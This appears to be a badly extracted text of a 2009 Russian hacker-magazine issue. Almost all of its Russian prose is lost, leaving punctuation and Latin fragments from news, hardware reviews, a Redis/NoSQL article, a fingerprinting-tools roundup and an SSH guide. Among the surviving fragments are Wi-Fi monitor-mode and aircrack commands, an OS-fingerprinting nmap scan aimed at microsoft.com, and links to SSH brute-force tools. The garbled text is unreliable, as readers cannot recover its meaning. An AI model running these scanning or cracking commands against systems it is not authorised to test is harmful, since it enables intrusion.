Вы находитесь на странице: 1из 148

.

56

x 08 () 2009

.
210
:

08 (128) 2009

. 46
START

SQL!


fingerprinting
128

. 26

SQL


. 20


PCI DSS
. 52


, . , ,
?
,
,


, / .
,
: ,
,
.
? ,

. ,
CD
96 , , ,
. , , .
, ,
, , .
P.S. , : vkontakte.ru/
club10933209, .
.
. , ..
5-6
.
nikitozz, . .
nikitoz@glc.ru
udalite.livejournal.com
vkontakte.ru/club10933209

CONTENT
08(128)
004 MEGANEWS

FERRUM

018

ASUS EEE PC 1008HA

PC_ZONE

030

SQL

Full-guide Secure Shell

SSH'

040

060
064

076
082

110

PCI DSS

TWITTER

SYN/ACK

116
121

twitter-

X-TOOLS

070

106

066


socks-
Pythone

EASY-HACK

056

102

052

098

, SQL!

036

046

092

GUI PYTHON!

026

088

014

020

126
130
132

SCCM:
IT-

IN DA FOCUS

136

140

MegaFAQ Linux

143

IM, Skype, P2P

Linux VServer

Linux - 2009

PAM'

144

PSYCHO:

FAQ UNITED

FAQ

8.5

WWW2

web-

,
! .
, .

,
: ,
,
.
, :
,
, , ,
.
.

, security level
!
/

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

START

046

070
Fedora 11
Leonidas

102





>

>
(strekneva@gameland.ru)
>

> -

>


(andrey@gameland.ru)
>


(devald@gameland.ru)
>


(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2009

.
_ssh3r1ff(ssh3r1ff@gmail.com). .

>> meganews
J3

PC27

PC27

J3

MIFRILL / MIFRILL@R EAL.XAKEP.RU /


- ,
Apple .
2004 , ,
- ,
, . ,
!
Apple
, ,
. , ,
, excellent,
, ,
.

TWITTER

14%
21 .

, 300 ?
, , ,
,
MMOG. ,
, ,
. ,
, , , ( ). , .
,
.
. ,
MMORPG. , ,
:).

GOOGLE WAVE

100.000 30- (
).
004

X 08 /128/ 09

>> meganews
PC27

- ,
. ,
- , , ,
, . eMachines
( Acer) eMachines EZ1601-01
,
:
$400. ,
,
... . Intel Atom N270 (1.6 ),
Intel GMA 950, 1
(DDR2-533 ), 160
(SATA), ,
8x DVDR/RW DL SuperMulti.
. ,
, , , 18.5.
. C :
,
.
.

PC27

POSITIVE TECHNOLOGIES
,

74%



PCI DSS.

TPB
, The
Pirate Bay , ,
. ,
,
, ,
http://thevideobay.
org.
YouTube, , ,

. ,
Flash, HTML 5
<video> <audio>. ,
(, IE
).
, VideoBay : Firefox
3.5, Opera 9.52 preview, Google Chrome 3,
Safari 3.4 Safari 4.
.

Usenet
, ( ) Pirate Bay .
, .
, , , Usenet. -, ,
( 80-
) . , , Usenet
, , ,
. RIAA
, - ,
2007 Usenet.com Inc.
- -.
, .
, ,
\ Usenet.com.

006

X 08 /128/ 09

>> meganews
PC27

J3

Google


GMail



SMS.
,
Google ,
SMS
.
: GMail
,
,
.
,
, ,
help, Google
-



(

).
help ,


. -
!.
,
( ,
,
, IP),
,

.

IDC , 2008

67%.

Sony

, . Sony
10- VAIO
W.
Sony :
, .
.
: Intel Atom
N280 1.66 , 1 , 160
, - 3.1 , Bluetooth, Wi-Fi 802.11
b/g/n, LAN USB-. 10.1 ( 16:9), 1366768
. 3 .
$499.
.

MESSAGELABS,


90.4%.


5- , Production Godskitchen
Camel Urban Wave, Camel Zeppelin Production. ,
, ,
. -
: , , .

008

X 08 /128/ 09

>> meganews

Google Chrome OS


Nero, Google.
,
,
,
.
, :

,
Chrome OS

2010 . Linux,
x86 ARM . Chrome OS
, , open source
! ,
- , . Android Chrome OS
, ,
.
, Google .


.
, ,
. -
, . fail SGAE,
. , SGAE eD2K-
elrincondejesus.com.

, - . P2P-, , ,
,
. . ,
,

. , . ,
, .

Imagine Cup 2009


()
Microsoft
Imagine Cup 2009.
2003 Microsoft
. , ,
. . .
Vital Lab , ,
Imagine cup Software Design (
). ViVa,
:
, ,
. 69 ,
SYTECH.

!


Trend Micro , Symbian OS.
, Symbian Foundation,
. . ,
, Sexy Space,
ACSServer.exe, , ,
.
, ,
. ,
SMS-
.

Fanta
Fanta Fanta
. :
, ,
50 !
Fanta 0,5 ., 1 .
2 . .
X 08 /128/ 09

009

>> meganews

? ?
Google GMail ,
Labs .

eBay PayPal,
.
DKIM,
, , ,
.
.
(
, , ,
).

15- MICROSOFT

MICROSOFT OFFICE 2000,

10 .

Microsoft coming
soon
Apple, , Microsoft
, .
,
,
- Microsoft Worldwide Partner Conference.
Microsoft ,
Windows 7. ,
Apple,
, , . Microsoft
,
, .

USB 3.0 SATA 6 Gbit/s


, , ,
USB 3.0. , ASUSTeK Computer! Asus P6X58
Premium Computex 2009,
SATA-600. , , USB
3.0 , ,
. (4.8 / 600 /)
SSD- :). USB 3.0
NEC 720200, ,
USB- .
, P6X58 Premium ,
. X58,
Core i7 ( Socket LGA1366) : 6 DIMM- DDR3; 3 PCI Express 2.0
16, 1 PCI Express 1 2 PCI; 1 IDE- 6 SATA II; 2
Ethernet-; 7.1 , 2 PS/2, 6 USB 2.0, FireWire, S/PDIF-
RJ-45.
.

010

X 08 /128/ 09

>> meganews

Project Natal
Windows
, Microsoft E3. Project Natal
X-Box 360,
. Natal
,
( )
, , .
,
,
. Microsoft , Natal Windows . ,
,
(, , ,
, ), .
.

!
,
,

,
, , ,
. ? , ,

.
Nokia,

Sony Ericsson, Motorola, Apple, LG,


NEC, Qualcomm, Research in Motion,
Samsung Texas Instruments, , 2010


micro USB
( mini USB). ,

30
!


INTERPRET ,

X 08 /128/ 09

36% .

11



30 Windows 7, ,
, . ? , !
, .
Velle - ,
.
:
Velle

Velle
Velle ,
VITAVEN, Velle

www.velleoats.com

X 07 /127/ 09

053

>> ferrum
:


, . ,
(, ) , . - , -
,
, , Intel X58.
,
58, LGA1366. ,
Intel Nehalem
DDR3 (),
. QPI
25.6 /.
ICH10R
6 PCIe x1 12 USB.

nVidia SLI,
Intel.
,

, nVidia .
, , SLI . ,
,
,
. 36 PCI-E 2.0,
, 3-way
SLI PCI-E 8x. ,
, ,
16 ,
,
nVidia nForce 200, 16 PCI-E.
,
, .

014


,

. , 6
Kingston, JEDEC (
1.5, 1333 , 9-9-9-24).
:
Lavalys Everest 5 ( )
Passmark Perfomance Test 6.1.

Microsoft Windows XP SP3,
BIOS
.
,
,

: Intel Core i7 Extreme 965


, : 6, Kingston KVR1333D3N9K3/6G
: Gigabyte GV-N28-1GH-B (
NVIDIA GTX280)
, : 192, SSD-
Transcend TS192GSSD25S-M
: Sony NEC Optiarc AD7200S
: Noctua NH-C12P
, : 720, Enermax Infiniti
BIOS,
,
.
,
.


LAVALYS EVEREST
MSI Eclipse SLI
Intel DX58SO
Gigabyte EX58-Extreme
ECS X58B-A

Everest memory
benchmarkCopy(M/)
Everest memory
benchmarkWrite(M/)
Everest memory
benchmarkRead(M/)

ASUS P6T6 WS Revolution


ASRock X58 Deluxe
0 2000 4000 6000 8000 10000 12000 14000 16000 18000

X 08 /128/ 09

>> ferrum

ASRock X58
Deluxe

7520 .

:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI (3 .), PCI-E x16 (4.)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, COM, HDMI-S/PDIF
: SATA 2.0 (6 .), IDE, Floppy
RAID: 0/1/5/10, Intel Matrix Storage
: PS/2, S/PDIF ( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA, MiniJack 3.5 mm (6 .)
: Realtek ALC890
: Realtek RTL8111DL

ASRock X58 Deluxe


.
, .
PCI-Express 2.0 ( 16 )
PCI 2.0, SATA II, IDE floppy;
USB USB\eSATA
. DDR3
1866 .
10 ,
2000 . , PCI-E
PCI 3 nVidia (SLI-
3 ) 4 ATI (CrossFire-
).

. BIOS ,
.
X 08 /128/ 09

ASUS P6T6 WS
12500 .
Revolution
:
: Intel X58 Express + NVIDIA nForce 200,
Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI-E x16 (3 .), PCI-E x8 (2 .), PCI-E x4 (1 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in
: SATA 2.0 (6 .), SAS (2 .)
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA (2 .), MiniJack 3.5 mm (6
.)
: Realtek ALC890
: Realtek RTL8111DL

Revolution
! , LPT COM,
PCI IDE.
PS/2. : PCI-E 2.0, eSATA,
SATA II SATA\SAS.
,
molex.
PCI-Express 2.0 16
nVidia nForce 200.

8, 4.
, , ,
,
.

015

>> ferrum

10600 .

8100 .

ECS Black
X58B-A
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .),
PCI-E x1 (2 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, IEEE1394a, S/PDIF,
: SATA 2.0 (6 .), eSATA 2 .
RAID: 0/1/0+1/5
: PS/2, RJ-45, IEEE1394a, USB 2.0 (6 .),
eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC888S-VC
: Realtek RTL8111C

Gigabyte
GA-EX58-Extreme
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/2100+ nonECC
BIOS: Award BIOS
: PCI (2 .), PCI-E x16 (2 .), PCI-E x1 (1 .),
PCI-E x4 (1 .), PCI-E x8 (1 .)
: 24- 8- , 4
( ),
IEEE1394a (2 .), USB 2.0 (2 .), - , CD-in
: SATA 2.0 (10 .), IDE, Floppy
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45 (2 .), IEEE1394a, USB 2.0 (8 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D

. , , , .
, , -, POST-, Power
Reset, , BIOS,
, , .
.
eSATA,
USB FireWire.
PCI-Express 2.0 x16, PCI 2.0, PCI-Express
x4 PCI Express x1.

,
(
), . , , Gigabyte,
Ultra Durable 3.
, ,
. , Power
Reset, POST-, , ,
, BIOS.
, 10 SATA 2.0 .
,
Intel VRD 11.1


,
PCI-Express.

016

X 08 /128/ 09

>> ferrum
8050 .

10600 .

Intel
DX58SO
:
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .)
: 24- 8- ,
5 ( 2 ),
IEEE1394a, USB 2.0 (2 .), IR, -

: SATA 2.0 (6 .)
RAID: 0/1/5/10
: S/PDIF (), RJ-45,
IEEE1394a, USB 2.0 (8 .), eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D

Intel, ,
,
. , ,
(4 ). ,
. PS/2 ,
eSATA. IDE
, SATA-. ,
PCI-Express x1, PCI-Express x16 4.
,
. ,
BIOS, (Power Slope),
.
BIOS .

, ,
, , .
, ,
.

,
, , -
.
Gigabyte
GA-EX58-Extreme,
X 08 /128/ 09

M Eclipse
MSI
S
SLI
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (2 .), PCI-E x16 (3.), PCI-E x1
: 24- 8- , 6
( ),
IEEE1394a, USB 2.0 (2 .)
: SATA 2.0 (10 .), IDE
RAID: 0/1/5/10/JBOD, Intel Matrix Storage
: PS/2, RJ-45(Ethernet) 2 .,
IEEE1394a, USB 2.0 (8 .), eSATA 2 .
:
Creative Sound Blaster X-Fi Xtreme Audio
: Realtek 8111C (10/100/1000 /) 2 .

. ,
,
Creative Sound Blaster X-Fi Xtreme Audio,
. , GreenPower Genie,
BIOS MSI.
10 SATA, 2 eSATA\USB
.
POST-, , , .
.

,
(
, Intel
Core i7).
OCZ. , , , MSI, ,
.

.
Intel
DX58,
. ,
ASUS P6T6 WS Revolution
MSI Eclipse SLI. , ,

. ASUS
SAS nVidia nForce 200
. MSI
,
SATA. .z

017

>> ferrum

ASUS

Eee PC 1008HA

,
X-Toolz. ,

, . ASUS Eee PC 1008HA.
, , , : , !.
: 18 25,7 . ,
.
Eee PC 1008HA
. ,
, .
, 1.1 ,
, 10" 6
.


, ASUS .
Eee PC, ,

018

Python, .
. 1008HA
,
. ,
: ,
Shift . ,
,
14" .


(
1024 x 600) , ,
.

Visual Studio Eclipse.
X 08 /128/ 09

>> ferrum
. , , Eee PC ,
, SVN-,
.
. ,
:).
1008HA . Eee PC Intel Atom.
Atom N280 1,66 , 1
160 . Windows XP Home , - , Windows 7
. Release-candidate , Microsoft , -
. , ,
, .

VOIP
, . 13,
1008HA,
. , ,
.
VoIP- ,
.
, z SIP Skype.
1.3 , ,
. ,
-, ,
.
Bluetooth-. Bluetooth 2.1 EDR
.

?

. ,
,
. 1008HA ,

6
. - 2,900
(, ,
) ,
. , , ,
.
65%,
Komodo Edit
15% . ,
4,5-5 .
,
, . .
?
Intel Atom N280,
. 1,66
667 Intel GN40.
N270,

.
X 08 /128/ 09


,
.
, , - .
, Eee PC 1008HA
Intel. , Kismet Airocrack
.
Monitoring Mode, .

Wi-Fi Intel . 1008HA, , .
Linux
Backtrack4, ( ). ,
,
:
modprobe ath9k
airmon-ng start wlan0
airodump-ng wlan0

Wi-Fi,
airodump, . ,
, .
, ,
aircrack-ng.

!
, Eee PC ASUS
. ,
.
,
, . .
? !
ASUS
trendclub.ru. z

TREND CLUB , . Trend Club


, ,
. Trend Club Intel ASUS
.
Intel, , , , .
Intel Web- Intel www.intel.ru,
http://blogs.intel.com.
Intel www.intel.ru/rating.

019

>> pc_zone
DATA

KEY

Fox

Hash
function

DFCD3454

The red fox


runs across
the ice

Hash
function

52ED879E

The red fox


walks across
the ice

Hash
function

46042841

DISTRIBUTED
NETWORK

PEERS


/ ALEKS.RAIDEN@GMAIL.COM /

, SQL!
SQL
? SQL, ? ,
. , , SQL . . !
, ,
, ? Google, Amazon,
eBay, Twitter, Facebook
? -,
PHP+mySQL. .
, , ,
.


, ,

. ,
,

, ,
. ,

(
#125
z ). ,
- ,

020


.
.
- . -.
: ,
, , ,
.
master-slave, BDSM !
, ,
,
. ,
, .
, ( ,
)?
: ,
? ,
,
,
.
(

master-master multi-master ),
,
.

,
.
,

. , ,
. ,
.
. .


SQL-!
,
,
. ?
!
? ( ,
)
,
SQL (, X 08 /128/ 09

>> pc_zone
-. ,
, / ( );
.

- - (DHT).
, ,

, ( ,

torrent).

,

, .



MEMCACHEDB
) .

, ?

,
.
, ,

(
) .


,
? !
, SQL,
,
.
, - , .
.
.
,

.
-, ?
key-value database!
,
. , ,
:
( ) ,

. ,

.
,
.
X 08 /128/ 09


get ( ),
set ( ), delete ( ), update (
).
,
,
( ,
)
.
, ( SQL
).
.., , , ,
,
.
key-value .
,
, , ,
,

(BLOB-),

. DHT ,
, .
.
, ! ,

, (
,

).

.
, , .

. ,
!
, , ,


. ! , ,
SQL-,
,
, .

- , .

021

>> pc_zone

HTTP://WWW
links
:
http://en.wikipedia.
org/wiki/Multimaster_replication.
Google:
http://highscalability.
com/googlearchitecture.
Google
:
http://labs.google.
com/papers/bigtable.
html.
DHT:
http://ru.wikipedia.
org/wiki/DHT.
Memcached:
http://danga.com/
memcached.

Facebook:
http://github.com/
fbmarc/facebookmemcached/tree/
master.

PHP
Redis-

:
http://code.google.
com/p/redis-ajaxchat.

022

(
SQL-
-). , .
, SQL,
, .
, SQL key-value , .

,
, , .

. MemcacheDB,
memcache BerkleyDB,
. ,
Redis
.
,
,
.

, !
! ,
.
Memcached/MemcacheDB (memcachedb.org) ,
key-value DB.
, ,
, .
, ,
, ,
.
UDP- ,
, , 1.4,
. Facebook , ,
! ,

Memcached- ! ,
. , , MemcacheDB,

. ,
( ),
.
Project Voldemort (project-voldemort.com)
, , .
Java .
.
, Project Voldemort JavaAPI , ,
Google ProtoBuf Thrift,
. ,
( ),
.
,

, , .
: 10-20

VOLDEMORT
PROJECT

, , LinkedIn ,
.
CLOUD
Apache CouchDB (couchdb.apache.org)
COMPUTING
! , CouchDB ,
-.
, , -.
, (), , ,
. , ,
. Apache
CouchDB Erlang ( , ) HTTP
REST- JSON API,
JavaScripta- -!
, ,
? , JavaScript SQL.
,
. , .
Redis (code.google.com/p/redis)
,
! ?
. 100
. ,
Redis , , .
, ,
( -),
( !) .
, memcached ,
- , Redis-
! ,

key-value ( SQL,
). ANSI C
(
BSD),
. TCP
telnet. , API
. ,
- PHP, ! :)


TWITTER?!
, , ,
,
X 08 /128/ 09

>> pc_zone

VOLDEMORT
(, ,
).
. , (Twitter)

X 08 /128/ 09

.
,

.

(
).
Redis.
,
HTML- ,
,
.
0. , .
( ,
), ,
() , ( ,
).
1.
-,
,
(
, , ),
, , ,
.
JSON
,
JSON . SET
admin {name:supervasya,age:21,sex:m,re

025

>> pc_zone

COUCHDB

gistered:27.07.2009} admin.
, GET admin, JSON- .
: SET admin_pass
md5(password) , _pass, md5 .
( ,
). , : EXISTS admin,
(, ),
: GET admin_pass. . ( SELECT COUNT() ): INCR
count_user 1.
,
, , (set): SADD
all_user_list admin. , all_user_list
, .
2. . ,
, -
( !). , , , admin_11232142135,
: SET
admin_11232142135 {author:admin,text: ! ,time:
11232142135,title:!}. ,
,
. : RPUSH admin_msgs 11232142135.
admin_msgs . ?
,
, .
,
.
3. () , .
, : RPUSH admin_follow vasja. admin_follow
, admin.
, , :
RPUSH vasja _follow admin.
4. .
, . , , , .
, .

024

, .
. , .
( ): LLEN admin_follow. ,
2 ( ):
LRANGE admin_follow 0 1 .
, ,
.
.
, ,
. , N
LRANGE,
( + _msgs). ,
, Redis- ,
. ,
KEYS,
. ,
( , ).
(
,
).
,
, .
, JSON-
, 3600 (
). , 100,
.
+ , (,
),
login_time ( , Redis-e), .
, , ,
array_merge , array_sort.
,
SQL-.
,
.
Redis-
, .
,
memcached (
) MGET _,

X 08 /128/ 09

>> pc_zone

: MS SQL ,
, SQL Shield

COUCHDB
SysComments Decryptor ,

, .
,
JSON- .
-, JSON
AJAX-. JSON
,
.
admin_follow,
, , MGET, ,
.

.
admin_follow ,
LREM, ,
.

?
(SQL ) ,
,
.
,
,
. !
,
, SQL-,
- . , ,
, !
, Redis MemcachedDB, ,
- , , (
, -, )
key-value ! ,
, ! SQL-
.z

X 08 /128/ 09

025

9
TOOLS

9
TOOLS

>> pc_zone

9
TOOLS
9
TOOLS

STEP
/ STEP@GLC.RU /

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
9
TOOLS
TOOLS

9
TOOLS

9
TOOLS
9
TOOLS

9TOOLS

z . ,
, , . . ,
. , , fingerprinting.


. ,

. , ,
.
, ,

(, ,
),
, ,
, ,
.
fingeprinting,
.
fingerprinting
: FIN-, ICMP ,
ICMP TCP-.
TCP/IP
. .
, .

, TTL (
), DF ( ), TOS
(Type-Of-Service) ..
fingerprinting-
. , DF
( OpenBSD),
, DF ( ).
TTL: FreeBSD
Linux 64. ,
OS

026

, .
,

.
fingerprinting .
,
fingerprinting.

Nmap
http://nmap.org
: Unix, MacOS,
Win32

, fingerprinting
Nmap.
, -

,
, . , c
. , Nmap ,

OS Fingerprinting (
-O). ,
Nmap
. microsoft.com :).
nmap -O -PN microsoft.com
Starting Nmap 4.76 ...
Running (JUST GUESSING) : OpenBSD
4.X (86%)
Aggressive OS guesses: OpenBSD
4.3 (86%)

Nmap:
nmap -O -PN microsoft.com
Starting Nmap 5.00 ...
Running (JUST GUESSING) :
Microsoft Windows 2003 (91%)
Aggressive OS guesses: Microsoft
Windows Server 2003 SP2 (91%)

,
NMAP

-


.
, zenmap
X 08 /128/ 09

9
TOOLS

9
TOOLS
9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS
9
TOOLS

.
,
, , advanced

. ,


.
Intense
scan , . -,
Nmap

, embedded. MAC Asustek. 80
HTTP-,
,
WL500gP!
:). 5.00
,
,

.
MSRPC/
NetBIOS ,
,
.

Ncat, ,
.
,
,
Ndiff. , . -
,
,

.

p0f v2
camtuf.coredump.cx
: Unix, MacOS,
Win32

Nmap,
fingerprinting, p0f
. .. - ,
. , - IDS ( ).
p0f
, :
,
( SYN );
, (
SYN+ACK);
, ( RST+), - ,
;
X 08 /128/ 09

9
TOOLS

9
TOOLS
9
TOOLS

P0F
,
( -
).


,
NAT, ,

. p0f
, ,
Nmap
. , ,
- .
lookup, , ARIN-
!
p0f ,

(
),
.
,
.
lcamtuf.
coredump.cx/p0f-help , ,
.

THC-Amap
thc.org/thc-amap
: Unix, MacOS,
Win32

, , .

( Nmap), ,
, .
,
: ,
FTP 21, SSH 22 .. ,

, .
,
.
, ..
FTP-, 31337 ,
. !
Amap
TH. ,

>> pc_zone
9
TOOLS

. , ,
. ,

, .

SSH-, 988
, -, 29-.
Amap , .
Nmap.
: Nmap, ,
,
THC-Amap, .
:
#nmap -sS -oM results.nmap -p
1-65535 IP-
#amap -i results.nmap -o results.
amap -m

,
, - .

httprint
www.net-square.com
/httprint
: Linux, MacOS,
FreeBSD, Win32


,
. ,
HTTP , , -

027

9
TOOLS

9
TOOLS

>> pc_zone

9
TOOLS
9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
9
TOOLS
TOOLS

9
TOOLS
9

NetworkMinerTOOLS
http://sourceforge.net/projects
/networkminer
: Windows

HTTP://WWW
links

fingerprint, p0f:
project.honeynet.org/
papers/finger.
ICMP fingerprint:
www.sys-security.
com/html/papers.
html.

DVD
dvd

fingerprint
DVD-.

NETWORKMINER
.
httprint.
. , , .
, , , (, mod_security.c)
ServerMask (www.port80software.com),
. Httprint .
Httprint ,
-. Apache, ISS -.
, , ADSL, .
SSL-, .
,
.

Nmap.
. , multi-threading
, .
, :
2005 .
,
Vista.

fingerprintinga?
fingerprinting .
, ,
.
, TCP/IP- . /proc/sys/net 64 . Windows RST (rst.void.ru) r57BF (broken fingers),
TCP/IP.
BSD-,
Sony Playstation 2 :).

028


. NetworkMiner

, PCAP.
,
.
,
, .
, NetworkMiner ,
, CLOUD
COMPUTING
.
,
( WLAN-
),
NetworkMiner ,
,
, .
TCP SYN SYN+ACK p0f Ettercap.
fingerprinting
DHCP-, Satori.
,
MAC-: Nmap.

ike-scan
www.nta-monitor.com/tools/ikescan
: Unix, MacOS, Win32

, ,

IKE-SCAN

VPN-.

IKE- . ,
VPN, ,
, ,
.
VPN- ike-scan . :
fingerprinting?. . VPN-,
.
fingerprinting, ike-scan,
X 08 /128/ 09

9
TOOLS

9
TOOLS
9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

9
TOOLS

>> pc_zone
9
TOOLS

XPROBE2, UBUNTU

SATORI

SINFP
, ,
.

Xprobe2
xprobe.sourceforge.net
: Unix

. Xprobe2
fingerprinting,
Nmap , , .

honeypot TCP/IP.
. , . , pf,
OpenBSD ,
TTL, . TCP- ( -T) xprobe
.
UDP-, -U.
, Xprobe2
fingerprinting ICMP-.
, fuzzing , TCP/IP, . ,
, , Xprobe -
, ,

.
X 08 /128/ 09

Satori
http://myweb.cableone.net/xnih
: Windows, Linux

Satori ,
OC fingerprinting, , , .
,
WinPCap,
, .
Satori Windows,
HP ( HP Swith Protocol), Cisco (
CDP-). ,
Satori, , DHCP. ,
,
. . Satori,
SAM, ARP- .

SinFP
www.gomor.org/bin/view/Sinfp/WebHome
: Unix, Windows

SinFP ,
,
.
. , Nmap
TCP/IP-, SinFP
. Perl,
,
. CPAN: search.
cpan.org/~gomor/Net-SinFP. , SinFP
, . z

029

>> pc_zone

STEP
/ STEP@GAMELAND.RU /


SSH
FULL-GUIDE SECURE SHELL
! . SSH Telnet,
, , .

Secure Shell .
1:
SSH-
SSH,
.
PuTTY (www.chiark.greenend.org.uk)
SecureCRT (www.vandyke.com), .
, PuTTY .

. , ,
, UNIX.
, Visualhack++.

: Raw, Telnet, Rlogin, FTP (SFTP), SSH1,
SSH2. , PuTTY ,

030

(putty.exe) :
puttygen rsa/dsa ,
;
pagent ,
,
;
plink
putty;
pscp , ;
psftp ftp- , ,
..
.
PuTTY,
SecureCRT.
? , ,
. -

, PuTTY , ,
.
,

,
PuTTY Connection Manager (puttycm.free.
fr). , -
PuTTY,
,
. , SSH-
-
(putty.exe), PuTTY Connection Manager
, .

#
PuTTY.

:
X 08 /128/ 09

>> pc_zone

PUTTY CONNECTION MANAGER


;

. ,
,

;

;
,

;
AES; , DLL-.

2:


/. ,
,
( ,
). PuTTY . PuTTY

SSH-,
,
. , ,
,
. .
Sessions.
IP- , , .
,
X 08 /128/ 09

. Connection
Data Auto-login username
(, UserAcc).
Sessions.
Saved Sessions ( ) , , session1, Save.
,
PuTTY, Saved Sessions, Load
Open. ,
. SSH
,
.


(/)
SSH- .
PuTTYgen,
. , ,
.
. OpenSSH
/.ssh/
authorized_keys2 :
mkdir ~/.ssh
chmod 700 ~/.ssh
vi ~/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAAE [.
. .] Huw2FekFNM7pMgEQi57k= dsakey-20061205
chmod 600 ~/.ssh/authorized_keys2

/
,

.
,
(SSH Auth Private key file
for authentification). ,

.
.
Pageant,

PuTTY.
,
sshproxy (sshproxy-project.org/
about), Python.
.
, ,
DMZ-.
SSH-,
sshproxy
.
,
, ,
.

3:

, SSH . .
, SSH-,

.

031

>> pc_zone
INFO

info

SSH:
SSH Brute
Forcer (www.
securiteam.com/
tools/5QP0L2K60E.
html)
SSHatter
(freshmeat.net/
projects/sshatter)
SSH BruteForcer
(www.darkc0de.com/
bruteforce)
THC Hydra (www.thc.
org/thc-hydra)

DVD
dvd



DVD.

SSH-
MOBASSH

FREESSHD
, .
.
PuTTY.
PuTTY :

Session Host Name (_ssh_), Port (22),
Protocol (SSH);
Connection/SSH/Tunnels, Add
new forwarded port, Source port (_
, , 666), Destination (___
:3306);
Local .
, 127.0.0.1 ,
Source Port (, 666).
unix- :
ssh -L666:___: -n
@_ssh_

MySQL, VNC-
..

4:
CLOUD
2-HOP TUNNEL
COMPUTING

2- ssh (2-hop ssh tunnel)?


SSH
,
, VNC ( ).
, : ,
( - ). ,
, , two hop tunneling
(, , ).
: ssh,
,
,
(
).


Symbian:
PuTTY for Symbian OS (s2putty.sourceforge.net)
Windows Mobile:
PocketPuTTY (www.pocketputty.net)
Java:
MidpSSH (www.xk72.com/midpssh)
iPhone:
iSSH (www.zinger-soft.com)

myhome.example.org,
gateway.example.com, SSH-
server.example.com.
- .
myhome.example.org :
ssh -f -N -L 51526:server.example.com:22 -2
gateway.example.com

! , SSH- 51526
myhome.example.org
(server.example.com). ,
server.example.
com:22,
51526, SSH.

032

X 08 /128/ 09

>> pc_zone

WINSCP
:

REMOTE
DESKTOP SSH
,
,
49152-65535.

5:
SSH-
.
- OpenSSH,
. ( , , ..)
DropBear (matt.ucc.asn.au/
dropbear/dropbear.html). , ,
SSH- ,
. OpenSSH
DropBear ,
. , WinSSHD (www.bitvise.com/
winsshd). WinSSHD
MobaSSH (mobassh.mobatek.net)
. , SSH- ,
Install.
.
MobaSSH
,
, OpenSSH,
Cygwin.

(ls dir
..). .
/cygdrive.
,
UNC-:
//<LAN_WORKSTATION>, /registry.
X 08 /128/ 09

MobaHwInfo:

MobaSwInfo:

MobaTaskList, MobaKillTask:
TCPCapture:
scp, sftp:
ssh-
rsync, wget:

MobaSSH 100% .
,
freeSSHd (www.
freesshd.com). ; ,
, ,
.
cmd.exe. , ,
, ,
,
, , , SFT ..

6:

Plink, PuTTY.

,
, . :
plink my-ssh-session

. ,
.
, -



. -
,
MyEnTunnel (nemesis2.qx.net/pages/
MyEnTunnel).

SSH-. : Plink.
( ,
-
), MyEnTunnel
Plink.
. ,
:
Slow Polling MyEnTunnel . ,
,
Wine .

7:

SSH,
(Secure file
transfer), SFTP (SSH File Transfer Protocol)
SCP (Secure CoPy).
SSH,

:
, ,
,
.

033

>> pc_zone
WinSCP (www.winscp.
net). , .
,
, , . , WinSCP
Pageant
.
, - ?
, , ,
SSH. ExpanDrive (www.expandrive.com),
SFtpDrive,
, , , .
,
- :).

8:
: ,
, , .
.
Telnet/SSH
Tera Term (http://www.ayera.com/teraterm). ,
-, Web
Accept HTTP Connections.
,
, . SSH-,
, .
, WebShell
(www-personal.umich.edu/~mressl/webshell).
Python,
. Ajax,
, (,
).

9: RDP SSH
SSH- VNC RPD
. RPD-
WiSSH (www.wissh.com). WiSSH Gateway SSH-
: Windows 2000 Terminal Servers; Windows 2003 Terminal Servers;
Windows NT Terminal Server Edition; Windows XP Windows 2000/2003
Remote Desktop.
, .

10:
. PuTTY Connection Manager
,
. , . ClusterSSH
